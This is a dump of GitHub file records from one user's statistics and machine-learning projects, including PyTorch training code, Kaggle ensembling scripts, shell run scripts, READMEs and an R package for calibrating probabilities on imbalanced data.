weight_decay=args.l2_wd)\n elif args.optimizer == 'adadelta':\n optimizer = optim.Adadelta(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'rmsprop':\n optimizer = optim.RMSprop(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'asgd':\n optimizer = optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.l2_wd)\n else:\n print('Defaulting to vanilla SGD')\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n scheduler = sched.LambdaLR(optimizer, lambda s: 0.999 ** s) # Constant LR\n criterion = nn.BCELoss()\n\n # Train\n log.info('Training...')\n steps_till_eval = args.eval_steps\n epoch = step // len(train_dataset)\n while epoch != args.num_epochs:\n epoch += 1\n log.info(f'Starting epoch {epoch}...')\n with torch.enable_grad(), \\\n tqdm(total=len(train_loader.dataset)) as progress_bar:\n for (i, batch) in enumerate(train_loader):\n # Setup for forward\n optimizer.zero_grad()\n model.zero_grad() # added for performance consideration\n\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n\n if torch.isnan(normalized_bows).any():\n log.info(f\"There are NaNs in bows at batch {i}\")\n\n # Forward\n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x K)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, )\n loss = criterion(output, target)\n \n # Backward\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n optimizer.step()\n scheduler.step()\n ema(model, step // batch_size)\n\n # Log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_postfix(epoch=epoch, \n 
loss=loss.item())\n tbx.add_scalar('train/loss', loss.item(), step)\n tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = args.eval_steps\n\n # Evaluate and save checkpoint\n log.info(f'Evaluating at step {step}...')\n ema.assign(model)\n results = evaluate(args, etm, model, val_loader, device)\n saver.save(step, model, results[args.metric_name], device)\n ema.resume(model)\n\n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'Val {results_str}')\n \n # Log to TensorBoard\n log.info('Visualizing in TensorBoard...')\n for k, v in results.items():\n tbx.add_scalar(f'val/{k}', v, step)\n\n\ndef evaluate(args, etm, model, data_loader, device):\n bce_meter = util.AverageMeter()\n acc_meter = util.AverageMeter()\n model.eval()\n criterion = nn.BCELoss()\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n for batch in data_loader:\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n \n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x embed_size)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, ), 1.0 to make it to float\n loss = criterion(output, target)\n pred = 1.0 * (output > 0.5)\n accuracy = (1.0 * (pred == target)).mean()\n \n bce_meter.update(loss.item(), batch_size)\n acc_meter.update(accuracy.item(), batch_size)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(BCE=bce_meter.avg, \n ACC=acc_meter.avg)\n \n results_list = [('BCE', bce_meter.avg), ('ACC', acc_meter.avg)]\n results = 
OrderedDict(results_list)\n model.train()\n return results\n\nif __name__ == '__main__':\n main(get_train_args())" }, { "alpha_fraction": 0.6756756901741028, "alphanum_fraction": 0.6860706806182861, "avg_line_length": 59.25, "blob_id": "b3e1b38c16b21aace0ffe9a4c05ae3ece755e99e", "content_id": "3a1a2555bced505a14a2d8f2f1a0d5eac8bdd15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/Kaggle_Travelers/notebooks/Combination.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import pandas as pd\nlgb_pred = pd.read_csv('../data/predictions/prediction_lightgbm.csv')\nxgb_pred = pd.read_csv('../data/predictions/prediction_xgboost.csv')\ncom_pred = pd.merge(lgb_pred, xgb_pred, on = \"claim_number\", how = \"left\")\ncom_pred['fraud'] = 0.6 * com_pred['fraud_x'] + 0.4 * com_pred['fraud_y']\ncom_pred.drop(['fraud_x', 'fraud_y'], axis = 1, inplace = True)\ncom_pred = com_pred.set_index('claim_number')\ncom_pred.to_csv('../data/predictions/combined_predictions.csv')" }, { "alpha_fraction": 0.4301075339317322, "alphanum_fraction": 0.5161290168762207, "avg_line_length": 22.25, "blob_id": "17bf39a4e1bbf9d3feb755ae1a2a92e4c69fde42", "content_id": "fe5f35543a9f53e2d7cefa79aa8109f6a7136ca6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 93, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/textual_causality/etm-ps/run_ps.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_ps.py \\\n --name ps \\\n --gpu_ids 4 5 6 7\\\n 2>&1 | tee logs/train_05.log\n" }, { "alpha_fraction": 0.5937336683273315, "alphanum_fraction": 0.6167101860046387, "avg_line_length": 34.48147964477539, "blob_id": "e4f6b3acc7764f82f43a8910d309b833cadc3470", "content_id": "322527ad235643313095663ed0498a039f8353bc", 
"detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1915, "license_type": "permissive", "max_line_length": 111, "num_lines": 54, "path": "/rbm_summarizer/train_textRBM/get_top15k_words.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# a file to get a list of top 15k most frequent words in the cnn/dailymail data\n\nfrom __future__ import unicode_literals, print_function, division\n\n# load modules in other files\nimport sys\nimport os\n\n\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom data_util import utils\nfrom data_util import config\n\n\n## step 1: load the stopwords provided by Stanford CoreNLP\nf = open(\"/home/yang6367/gitrepos/cnn-dailymail/corenlp-stopwords.txt\")\nstopwords = f.read().split('\\n')\nnew_stopwords = ['!!!', '!!!!', \"'''\", \"**\", \"***\", \"****\", \"*****\", \"******\", \"*******\", \"--\", \"-rcb-\", \"/\", ]\nstopwords = stopwords + new_stopwords\n\n## step 2: create a dictionary containing the lemmatized word count\nword_to_count = {}\nnum_words = 0\nmax_size = 50000\n\nwith open(config.vocab_path, 'r') as vocab_f:\n for line in vocab_f:\n pieces = line.split()\n try:\n # if the word is not a stopword, then add the count to the dictionary\n if pieces[0] not in stopwords:\n w = utils.lem(pieces[0]) # lemmatize the word\n if w in word_to_count: # if already in, then add up the count\n word_to_count[w] += int(pieces[1])\n else:\n word_to_count[w] = int(pieces[1])\n num_words += 1\n except:\n print(pieces)\n if num_words >= max_size:\n break\n\n## step 3: get top15k words\n# sort the dictionary by the count\nword_to_count_sorted = sorted(word_to_count.items(), key=lambda x: x[1], reverse=True)\n# choose the top 15k words\nword_to_count_top15k = word_to_count_sorted[:15000]\nwords_top15k = [key for key, value in word_to_count_top15k]\n# write the list of words to a 
txt file\nwith open(\"/home/yang6367/gitrepos/cnn-dailymail/top15k_words.txt\", \"w\") as f:\n f.writelines(\"%s\\n\" % word for word in words_top15k)" }, { "alpha_fraction": 0.7392638325691223, "alphanum_fraction": 0.7556236982345581, "avg_line_length": 53.38888931274414, "blob_id": "d57be4bfae570258844948ce712de7a14054fc13", "content_id": "4f66d418fe11df74fb3b76a6adda9ee12fa81f70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 978, "license_type": "no_license", "max_line_length": 315, "num_lines": 18, "path": "/lyft/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Kaggle: Lyft Motion Prediction for Autonomous Vehicles\n\n\n**Team Name**: Statdogs\n\n**Team members**: Dewei Chen, Xuesong Hou, Chunlin Li, Yu Yang\n\n**Ranking in Leaderboard**: [52nd](https://www.kaggle.com/yuyangstat) out of 935 teams.\n\nThe [datasets](https://www.kaggle.com/c/lyft-motion-prediction-autonomous-vehicles/data) for this competition are well preprocessed by the package [l5kit](https://github.com/lyft/l5kit). Check the [competition overview](https://www.kaggle.com/c/lyft-motion-prediction-autonomous-vehicles/overview) for more details.\n\n### Main Code\n Our models are CNN-based, and the final model is the ensemble of ResNet18, ResNet34, DenseNet121, EffecientNetB4, and EfficientNetB7.\n- `train.py`: train the models.\n- `eval.py`: evaluate the trained models on the validation set.\n- `pred.py`: predict on the test set.\n- `models.py`: the model frameworks using EfficientNet and DenseNet as backbone architectures. (ResNet not included here.)\n- `utils.py`: utility functions." 
}, { "alpha_fraction": 0.4421052634716034, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 22.75, "blob_id": "28a7c268f375fd22e7dfd4dbf22d6439b3e1d9a5", "content_id": "602439ff360be93d20b7dff0f1a28b6ef9eb86ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/textual_causality/etm-ps/run_etm.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_etm.py \\\n --name etm \\\n --gpu_ids 4 5 6 7\\\n 2>&1 | tee logs/train_01.log\n" }, { "alpha_fraction": 0.5049505233764648, "alphanum_fraction": 0.5891088843345642, "avg_line_length": 32.66666793823242, "blob_id": "b9f5f832d8a653710e72641d10b737526d411d4a", "content_id": "064199499404cb18af557359236600218fcbd2d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 202, "license_type": "no_license", "max_line_length": 84, "num_lines": 6, "path": "/textual_causality/etm-ps/test_ps2.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./test_ps2.py \\\n --name ps2 \\\n --gpu_ids 4 5 6 7\\\n --split \"train\" \\\n --ps_load_path \"/home/yang6367/text-causal/etm/save/train/ps2-01/best.pth.tar\" \\\n 2>&1 | tee logs/test_02.log\n" }, { "alpha_fraction": 0.7588075995445251, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 60.66666793823242, "blob_id": "93c317261fb0f2eb1379c1d20b98e8d2b64721c2", "content_id": "6f3dc758a1493875e1adfbbf7d4066000d73640b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 369, "license_type": "no_license", "max_line_length": 102, "num_lines": 6, "path": "/textual_causality/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# PUBH 8485 Final Project: Textual Causal Inference on CNNDM \n\n- `ate` contains the scripts for 
simulation and ATE estimation.\n- `etm-ps` contains the scripts for fitting the ETM model and the neurl propensity score model.\n- `report` contains the final report files.\n- `results` contains the ATE estimation results, with 1 indicating Scheme 1 and 2 indicating Scheme 2." }, { "alpha_fraction": 0.5689677000045776, "alphanum_fraction": 0.6071200966835022, "avg_line_length": 38.6708869934082, "blob_id": "001e3988a11ab55e6db27e32d4048f29b7cdefd6", "content_id": "c85491a80e0800bf98aaac015af17c1be171eb29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 15678, "license_type": "no_license", "max_line_length": 148, "num_lines": 395, "path": "/imbCalib/package/imbCalib/R/calibrate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\n\n# import libraries\nrequire('mltools')\nrequire('caTools')\nrequire('e1071')\nrequire('randomForest')\nrequire('foreach')\nrequire('doParallel')\nrequire('abind')\n\n\n#' Get binned probabilities.\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param nbins An integer. The number of bins.\n#'\n#' @return A list with two elements. 
The first element is the binned actual fractions, and\n#' the second element is the binned predicted probabilites.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' binProbs(y.true, y.prob)\n#'\nbinProbs <- function(y.true, y.prob, nbins=5){\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n # consider only uniform case temporarily\n bins <- seq(0, 1+1e-8, length.out = nbins+1)\n bin.ids <- as.factor(as.numeric(bin_data(y.prob, bins = bins, binType = \"explicit\")))\n output <- list(prob.true = sapply(split(y.true, bin.ids), mean),\n prob.pred = sapply(split(y.prob, bin.ids), mean))\n return (output)\n}\n\n\n#' Standard Brier Score\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#'\n#' @return A numeric scalar. The standard Brier score.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' brier(y.true, y.prob)\n#'\n#' @details\n#' Brier score measures the fit of probability estimates to the observed data.\n#' It is defined as the mean squared difference between the observed labels the\n#' estimated probability. A smaller value means a better calibration.\n#' \\deqn{BS = \\frac{\\sum_{i=1}^N (y_i - \\hat{P}(y_i | x_i))^2}{N}}\n#'\nbrier <- function(y.true, y.prob) {\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n return(mean((y.true - y.prob)**2))\n}\n\n\n#' Stratified Brier Score\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#'\n#' @return A list with three elements. 
The 1st is the standard Brier score, The 2nd is the Brier score\n#' for the positive class, and the 3rd is the Brier score for the negative class.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' stratifiedBrier(y.true, y.prob)\n#'\n#' @details\n#' Stratified Brier Score evaluates the goodness of calibration under the imbalanced scenario.\n#' \\deqn{BS^+ = \\frac{\\sum_{y_i=\\text{pos_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}}\n#' \\deqn{BS^- = \\frac{\\sum_{y_i=\\text{neg_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}}\n#'\n#' @references\n#' Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data.\n#' Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n#'\nstratifiedBrier <- function(y.true, y.prob) {\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n bs <- mean((y.true - y.prob)**2)\n bs.plus <- mean((y.true - y.prob)[y.true == 1]**2)\n bs.minus <- mean((y.true - y.prob)[y.true == 0]**2)\n\n return(list('BS' = bs, 'BS+' = bs.plus, 'BS-' = bs.minus))\n}\n\n\n#' Plot calibration diagram (reliability plot).\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param mod.name A string. The name of the model you want to plot, used in the legend.\n#' @param nbins An integer. The number of bins.\n#'\n#' @return A plot with two subplots. 
The top one is the calibration curve plot, and the bottom\n#' one is the histogram of the predicted probabilities.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' calibCurve(y.true, y.prob, 'Example')\n#'\ncalibCurve <- function(y.true, y.prob, mod.name, nbins=5){\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n calib.out <- binProbs(y.true, y.prob, nbins = nbins)\n brier.score <- brier(y.true, y.prob)\n\n layout(matrix(c(1, 1, 1, 2), 4, 1, byrow = TRUE))\n\n plot(c(0, 1), c(0, 1), lty = 2, col = 'black', type = 'l',\n main = 'Calibration Curve (Reliability Diagram)', xlab = \"Mean predicted value\",\n ylab = \"Fraction of positives\", xlim = c(0, 1), ylim = c(0, 1))\n\n lines(calib.out$prob.pred, calib.out$prob.true, type = 'o', lty = 1, col = 'blue')\n\n legend.name <- paste(mod.name, \" (\", round(brier.score, 4), \")\", sep = \"\")\n legend(\"bottomright\",\n legend = c(legend.name, \"Perfectly calibrated\"),\n lty = c(1, 2), col = c(\"blue\", \"red\"), cex = 0.5)\n\n hist(y.prob, breaks = nbins + 1, main = \"\", xlab = \"Mean predicted value\")\n\n}\n\n#' Plot comparison among calibrations.\n#'\n#' @description\n#' Do comparisons among different models or different calibration methods, in terms of the\n#' calibrated probabilities.\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param mod.name A string. The name of the model you want to plot, used in the legend.\n#' @param nbins An integer. 
The number of bins.\n#'\n#' @return A plot with calibration curves given by different calibrations.\n#' @export\n#'\n#' @examples\n#' library('e1071')\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' lr <- glm(y ~ ., data = train_set, family = \"binomial\")\n#' prob.lr <- predict(lr, X.test, type = \"response\")\n#' calibCurve(y.test, prob.lr, \"Logistic\")\n#' nb <- naiveBayes(y ~ ., data = train_set)\n#' prob.nb <- predict(nb, X.test, type = \"raw\")[, 2]\n#' calibCurve(y.test, prob.nb, \"Naive Bayes\")\n#' comparisonPlot(y.test, list(prob.lr, prob.nb), c(\"Logistic\", \"Naive Bayes\"))\n#'\n#' @references\n#' \\href{https://scikit-learn.org/stable/auto_examples/calibration/plot_compare_calibration.html}{sklearn: Comparison of Calibration of Classifiers}\n#'\ncomparisonPlot <- function(y.true, probs, mod.names, nbins=5){\n\n # probs should be a list, mod.names should be a vector\n n <- length(probs)\n brier.score <- unlist(lapply(probs, function(x) brier(y.true, x)))\n\n plot(c(0, 1), c(0, 1), lty = 2, lwd = 1, type = 'l', col = 1,\n main = \"Comparison of Calibration Curve\",\n xlab = \"Mean predicted value\", ylab = \"Fraction of positives\",\n xlim = c(0, 1), ylim = c(0, 1))\n\n for (i in 1:n){\n calib.out <- binProbs(y.true, probs[[i]], nbins = nbins)\n lines(calib.out$prob.pred, calib.out$prob.true, type = 'o', lty = 1, lwd=2, col = i+1)\n }\n\n legend.names <- mapply(function(name, score) {\n paste(name, \" (\", round(score, 4), \")\", sep = \"\")},\n mod.names, brier.score)\n legend(\"bottomright\", legend = c(\"Perfectly calibrated\", legend.names),\n lty = c(2, rep(1, n)), lwd = c(1, rep(2, n)), col = 1:(n+1), cex = 0.5)\n\n}\n\n\n#' Dataset under-sampling\n#'\n#' @param pos_set A dataframe. 
The dataframe for the positive class.\n#' @param neg_set A dataframe. The dataframe for the negative class.\n#'\n#' @return A dataframe. An under-sampled dataset, with equal number of positive class and\n#' negative class.\n#' @export\n#'\nunderSample <- function(pos_set, neg_set) {\n\n stopifnot(dim(pos_set)[2] == dim(neg_set)[2])\n\n sample_pos_set <- pos_set[sample(nrow(pos_set), nrow(pos_set), replace = TRUE),]\n\n sample_neg_set <- neg_set[sample(nrow(neg_set), nrow(pos_set), replace = TRUE),]\n\n sample_set <- rbind(sample_pos_set, sample_neg_set)\n\n return(sample_set)\n}\n\n\n\n\n#' Bagged undersampled calibration.\n#'\n#' @description Bagged undersampled calibration, can do both the weighted average and\n#' simple average on the bagged probabilities.\n#' Parallel computing is enabled to speed up the bagging procedure by specifying `ncluster`.\n#' Choose between weighted average of bagged probabilities or simple average using `ntimes`.\n#'\n#' @details The simple average and the weighted average of the bagged probabilities are defined\n#' as below.\n#'\n#' Simple average:\n#' \\deqn{\\hat{P}(y_i | x_i) = \\frac{1}{k}\\sum_{j=1}^k \\hat{P}_j(y_i | f_{ij})}\n#'\n#' Weighted average:\n#' \\deqn{\\hat{P}(y_i | x_i) = \\frac{1}{z}\\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))} \\hat{P}_j(y_i | f_{ij}),}\n#' where \\deqn{z = \\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))}.}\n#'\n#' @param trainset A dataframe. The training dataset.\n#' @param newX An array. The feature matrix of the new test data.\n#' @param response_name A string. The name of the response column in the training dataset.\n#' @param model A string. The model to calibrate. Options: `'svm'`, `'lr'`, `'nb'`, `'rf'`.\n#' @param formula A formula. The formula of the model.\n#' @param pos_label An integer. 0 or 1. The label for the positive class.\n#' @param nbags An integer. How many sample set are used for bagging. 
Note that a large value\n#' will not lead to overfitting and will reduce the variance more, with the only cost being\n#' heavy computation load.\n#' @param ntimes An integer. The number of times to run the model within each sample set.\n#' When `ntimes=1`, the output is the simple average of `nbags` sets of probabilities,\n#' and when `ntimes > 1`, the output is the weighted average, with the weight being the empirical\n#' variance of `ntimes` predicted probabilities within each sample set.\n#' @param ncluster An integer. The number of clusters to use in the parallel implementaion.\n#' @param ... Arguments with variable lengths. The extra arguments for specifying the model.\n#'\n#' @return A numeric vector. The calibrated probabilities by weighted bagged undersampled method.\n#' @export\n#'\n#' @examples\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' # standard calibration\n#' svc <- svm(formula = as.factor(y) ~ ., data = train_set, type = 'C-classification',\n#' kernel = 'linear', probability = TRUE)\n#' pred <- predict(svc, X.test, probability = TRUE)\n#' dec.svc <- attr(pred, 'decision.values')\n#' prob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\n#' stratifiedBrier(y.test, prob.svc)\n#' # calibration using bagged undersampling method (simple average)\n#' bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification',\n#' kernel = 'linear', nbags = 30, ntimes = 1, ncluster = 4)\n#' stratifiedBrier(y.test, bag.prob.svm)\n#' # calibration using weighted bagged undersampling method (weighted average)\n#' weighted.bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification',\n#' kernel = 'linear', nbags = 30, ntimes = 20, ncluster = 4)\n#' 
stratifiedBrier(y.test, weighted.bag.prob.svm)\n#'\n#' # comparison plot\n#' comparisonPlot(y.test, list(prob.svc, bag.prob.svm, weighted.bag.prob.svm),\n#' c(\"SVM\", \"bagged-under SVM\", \"Weighted-bagged-under SVM\"), nbins = 8)\n#'\n#' @references\n#' Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data.\n#' Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n#'\nbagCalibrate <- function(trainset, newX, response_name, model, formula=as.factor(y) ~ .,\n pos_label=1, nbags = 25, ntimes = 1, ncluster=4, ...) {\n\n stopifnot(response_name %in% names(trainset))\n\n # change response name to 'y'\n if (response_name != 'y') {\n colnames(trainset)[names(trainset) == response_name] <- 'y'\n }\n\n # obtain positive set and negative set\n pos_set <- subset(trainset, y == pos_label)\n neg_set <- subset(trainset, y != pos_label)\n\n # define the combine function used in foreach\n if (ntimes > 1) {\n cfun <- function(...) {abind(..., along=3)}\n } else {\n cfun <- function(...) 
{abind(..., along=2)}\n }\n\n #setup parallel back end to use 4 processors\n cl<-makeCluster(4)\n registerDoParallel(cl)\n\n wprobs <-foreach(j=1:nbags, .combine=cfun, .multicombine = TRUE, .packages = c('foreach'),\n .export = c('underSample', 'cfun')) %dopar% {\n\n # obtain sample set\n sample_set <- underSample(pos_set, neg_set)\n\n # for each sample set, run ntimes to obtain the empirical variance, and hence the weighted probs\n probs <- foreach(i=1:ntimes, .combine = cbind, .packages = c('e1071', 'randomForest')) %do% {\n\n if (model == 'svm') {\n\n clf <- svm(formula = formula, data = sample_set, ..., probability = TRUE)\n pred <- predict(clf, newX, probability = TRUE)\n prob_df <- as.data.frame(attr(pred, \"probabilities\")) # predicted probability\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n } else if (model == 'lr') {\n\n clf <- glm(formula = formula, data = sample_set, family = \"binomial\", ...)\n prob <- predict(clf, newX, type = \"response\")\n\n } else if (model == 'nb') {\n\n clf <- naiveBayes(formula = formula, data = sample_set, ...)\n prob_df <- as.data.frame(predict(clf, newX, type = \"raw\"))\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n } else if (model == 'rf') {\n\n clf <- randomForest(formula = formula, data = sample_set, ...)\n prob_df <- as.data.frame(predict(clf, newX, type = \"prob\"))\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n }\n\n prob\n\n }\n\n if (ntimes > 1) {\n # obtain median and variance of the probabilities, use 1 / variance as the weight\n # return the n*2 array to the outer foreach\n cbind(apply(probs, 1, median), 1/apply(probs, 1, var))\n } else {\n probs\n }\n\n }\n\n stopCluster(cl)\n\n if (ntimes > 1) {\n\n # wprobs is three-dim array of size: n*2*nbags\n P <- wprobs[, 1, ] # probabilities\n W <- wprobs[, 2, ] # weights\n # return weighted average of probabilities\n return 
(rowMeans(P * (W / rowMeans(W)) ))\n\n } else {\n\n # return simple average of probabilities\n return (rowMeans(wprobs))\n\n }\n\n}\n\n\n" }, { "alpha_fraction": 0.7561349868774414, "alphanum_fraction": 0.7914110422134399, "avg_line_length": 86, "blob_id": "eea3e8c799a35ca9e46f84746dc00e69dcbd0a11", "content_id": "9c3722b0e88cf61dad3b910009ce225c9dd6d2b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1304, "license_type": "no_license", "max_line_length": 335, "num_lines": 15, "path": "/MinneMUDAC/notebooks/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## MinneMUDAC 2019\n\nThis repository contains part of the code I have written for the MinneMUDAC project and the presentation slides of our talks. \n\n`spider.ipynb` crawls futures price data from https://www.mrci.com/ohlc/index.php. Note that there are some duplicate data. For example, data from [20161230](https://www.mrci.com/ohlc/2016/161230.php) is the same as [20170102](https://www.mrci.com/ohlc/2017/170102.php). Need to remove the duplicated values in preprocessing procedure.\n\n`last-week-pred.ipynb` uses the last week as validation and make predictions on the last week.\n\n`next-week.ipynb` makes predictions for the desired upcoming week.\n\n`tweet.ipynb` deals with tweet data. It uses LDA model to cluster tweet topics and thus obtains trade relavant and economy relavant tweets. Trump's tweet data is from http://www.trumptwitterarchive.com/archive. The result is shown in `tweetLDA11.html`.\n\n`feature-importance.ipynb` runs models on the stationarized data. Models include linear model, ridge regression, lasso regression, and XGBoost. Also, SHAP is used to interpret XGBoost model.\n\n`ts-modeling.ipynb` tries time series modeling. It is mostly based on [mlcourse.ai](https://github.com/Yorko/mlcourse.ai/blob/master/jupyter_english/topic09_time_series/topic9_part1_time_series_python.ipynb)." 
}, { "alpha_fraction": 0.6019288301467896, "alphanum_fraction": 0.6197206377983093, "avg_line_length": 32.41666793823242, "blob_id": "fb4b3d546636f5cd11d1954ce7ed0310cf02e844", "content_id": "53ce95f26d54486d0655d07f1854fad4432fe09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6014, "license_type": "no_license", "max_line_length": 130, "num_lines": 180, "path": "/lyft/pred.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from typing import Dict\n\nfrom tempfile import gettempdir\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom tqdm import tqdm\n\nimport l5kit\nfrom l5kit.configs import load_config_data\nfrom l5kit.data import LocalDataManager, ChunkedDataset\nfrom l5kit.dataset import AgentDataset, EgoDataset\nfrom l5kit.rasterization import build_rasterizer\nfrom l5kit.evaluation import write_pred_csv, compute_metrics_csv, read_gt_csv, create_chopped_dataset\nfrom l5kit.evaluation.chop_dataset import MIN_FUTURE_STEPS\nfrom l5kit.evaluation.metrics import neg_multi_log_likelihood, time_displace\nfrom l5kit.geometry import transform_points\nfrom l5kit.visualization import PREDICTED_POINTS_COLOR, TARGET_POINTS_COLOR, draw_trajectory\nfrom prettytable import PrettyTable\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\nfrom json import dumps\nimport 